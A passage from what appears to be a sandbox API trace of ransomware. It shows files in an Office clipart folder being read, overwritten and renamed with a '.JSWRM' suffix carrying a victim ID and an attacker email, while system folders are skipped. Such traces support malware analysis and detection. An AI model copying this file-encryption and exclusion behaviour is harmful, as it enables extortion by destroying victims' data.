dwReserved1=0x20924e, cFileName="SO02054_.WMF", cAlternateFileName="")) returned 1 [0097.385] lstrcmpiW (lpString1="SO02054_.WMF", lpString2=".") returned 1 [0097.385] lstrcmpiW (lpString1="SO02054_.WMF", lpString2="..") returned 1 [0097.385] lstrcmpiW (lpString1="SO02054_.WMF", lpString2="...") returned 1 [0097.385] lstrcmpiW (lpString1="SO02054_.WMF", lpString2="windows") returned -1 [0097.385] lstrcmpiW (lpString1="SO02054_.WMF", lpString2="recovery") returned 1 [0097.385] lstrcmpiW (lpString1="SO02054_.WMF", lpString2="perflogs") returned 1 [0097.385] lstrcmpiW (lpString1="SO02054_.WMF", lpString2="documents and settings") returned 1 [0097.385] lstrcmpiW (lpString1="SO02054_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.385] lstrcmpiW (lpString1="SO02054_.WMF", lpString2="system volume information") returned -1 [0097.385] lstrcmpiW (lpString1="SO02054_.WMF", lpString2="msocache") returned 1 [0097.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0097.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02054_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02054_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02054_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0097.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0097.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02054_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02054_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02054_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0097.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0097.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0097.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0097.385] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02054_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02054_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.386] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12490) returned 1 [0097.386] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30c0) returned 0x24d210 [0097.386] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x30c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x30c0, lpOverlapped=0x0) returned 1 [0097.605] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.605] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x30c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x30c0, lpOverlapped=0x0) returned 1 [0097.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0097.605] CloseHandle (hObject=0x314) returned 1 [0097.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0097.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0097.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0097.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0097.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0097.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0097.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0097.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0097.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0097.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0097.609] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02054_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02054_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02054_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02054_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0097.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0097.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0097.613] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4c4c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02055_.WMF", cAlternateFileName="")) returned 1 [0097.613] lstrcmpiW (lpString1="SO02055_.WMF", lpString2=".") returned 1 [0097.613] lstrcmpiW (lpString1="SO02055_.WMF", lpString2="..") returned 1 [0097.613] lstrcmpiW (lpString1="SO02055_.WMF", lpString2="...") returned 1 [0097.614] lstrcmpiW (lpString1="SO02055_.WMF", lpString2="windows") returned -1 [0097.614] lstrcmpiW (lpString1="SO02055_.WMF", lpString2="recovery") returned 1 [0097.614] lstrcmpiW (lpString1="SO02055_.WMF", lpString2="perflogs") returned 1 [0097.614] lstrcmpiW (lpString1="SO02055_.WMF", lpString2="documents and settings") returned 1 [0097.614] lstrcmpiW (lpString1="SO02055_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.614] lstrcmpiW (lpString1="SO02055_.WMF", lpString2="system volume information") returned -1 [0097.614] lstrcmpiW (lpString1="SO02055_.WMF", lpString2="msocache") returned 1 [0097.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0097.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02055_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02055_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02055_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0097.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0097.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02055_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02055_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02055_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0097.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0097.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0097.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0097.615] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02055_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02055_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.618] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19532) returned 1 [0097.622] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4c40) returned 0x24d210 [0097.622] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4c40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4c40, lpOverlapped=0x0) returned 1 [0097.625] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.625] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4c40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4c40, lpOverlapped=0x0) returned 1 [0097.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0097.625] CloseHandle (hObject=0x314) returned 1 [0097.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0097.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0097.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0097.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0097.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0097.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0097.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0097.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0097.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0097.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0097.625] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02055_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02055_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02055_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02055_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0097.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0097.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0097.627] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x382a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02067_.WMF", cAlternateFileName="")) returned 1 [0097.627] lstrcmpiW (lpString1="SO02067_.WMF", lpString2=".") returned 1 [0097.627] lstrcmpiW (lpString1="SO02067_.WMF", lpString2="..") returned 1 [0097.627] lstrcmpiW (lpString1="SO02067_.WMF", lpString2="...") returned 1 [0097.627] lstrcmpiW (lpString1="SO02067_.WMF", lpString2="windows") returned -1 [0097.627] lstrcmpiW (lpString1="SO02067_.WMF", lpString2="recovery") returned 1 [0097.627] lstrcmpiW (lpString1="SO02067_.WMF", lpString2="perflogs") returned 1 [0097.627] lstrcmpiW (lpString1="SO02067_.WMF", lpString2="documents and settings") returned 1 [0097.627] lstrcmpiW (lpString1="SO02067_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.627] lstrcmpiW (lpString1="SO02067_.WMF", lpString2="system volume information") returned -1 [0097.627] lstrcmpiW (lpString1="SO02067_.WMF", lpString2="msocache") returned 1 [0097.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0097.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02067_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02067_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02067_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0097.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0097.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02067_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02067_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02067_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0097.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0097.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0097.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0097.627] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02067_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02067_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.629] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14378) returned 1 [0097.629] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3820) returned 0x24d210 [0097.629] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3820, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3820, lpOverlapped=0x0) returned 1 [0097.631] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.631] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3820, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3820, lpOverlapped=0x0) returned 1 [0097.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0097.631] CloseHandle (hObject=0x314) returned 1 [0097.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0097.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0097.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0097.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0097.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0097.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0097.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0097.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0097.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0097.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0097.632] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02067_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02067_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02067_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02067_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0097.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0097.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0097.633] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b4a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02094_.WMF", cAlternateFileName="")) returned 1 [0097.633] lstrcmpiW (lpString1="SO02094_.WMF", lpString2=".") returned 1 [0097.633] lstrcmpiW (lpString1="SO02094_.WMF", lpString2="..") returned 1 [0097.633] lstrcmpiW (lpString1="SO02094_.WMF", lpString2="...") returned 1 [0097.633] lstrcmpiW (lpString1="SO02094_.WMF", lpString2="windows") returned -1 [0097.633] lstrcmpiW (lpString1="SO02094_.WMF", lpString2="recovery") returned 1 [0097.633] lstrcmpiW (lpString1="SO02094_.WMF", lpString2="perflogs") returned 1 [0097.633] lstrcmpiW (lpString1="SO02094_.WMF", lpString2="documents and settings") returned 1 [0097.633] lstrcmpiW (lpString1="SO02094_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.633] lstrcmpiW (lpString1="SO02094_.WMF", lpString2="system volume information") returned -1 [0097.633] lstrcmpiW (lpString1="SO02094_.WMF", lpString2="msocache") returned 1 [0097.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0097.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02094_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02094_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02094_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0097.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0097.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02094_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02094_.WMF", cchWideChar=12, 